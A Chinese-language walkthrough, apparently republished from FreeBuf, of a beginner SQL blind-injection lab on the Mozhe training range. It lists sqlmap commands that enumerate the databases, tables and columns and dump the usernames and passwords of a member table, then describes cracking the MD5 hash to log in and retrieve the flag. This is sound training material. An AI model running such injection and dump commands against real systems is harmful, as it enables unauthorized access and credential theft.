墨者靶场SQL盲注(入门)
2021-04-09 12:25:43 Author: www.freebuf.com(查看原文) 阅读量:95 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

1617938434_606fc8028fd845a0831a1.png!small

1.打开靶场,看到此处(主要是针对SQL注入,所有直接找注入点,登录先不看)

1617938464_606fc820493a7e4acaa4b.png!small

2.看到了平台停机维护,看到URL的参数id,下意识以为找到位置了

1617938527_606fc85f517d45f28e88a.png!small

3.放到神器sqlmap跑一下看看,发现目标!

1617938588_606fc89cbe030703f6f07.png!small

4.继续爆破数据库、表、用户名密码

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 --dbs

1617938629_606fc8c507cc565e9f7fb.png!small

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup --tables

1617938638_606fc8cea8bb848f08059.png!small

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member --columns

1617938647_606fc8d7e8447b2c03a64.png!small

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member -C name,password --dump

1617938657_606fc8e18fdf891a8139e.png!small

5.获取密码后,发现是md5加密,进行解密后发现第二账号可以登录,登录后即可看到KEY

1617938667_606fc8eb6bb83eaa159c8.png!small


文章来源: https://www.freebuf.com/vuls/269009.html
如有侵权请联系:admin#unsafe.sh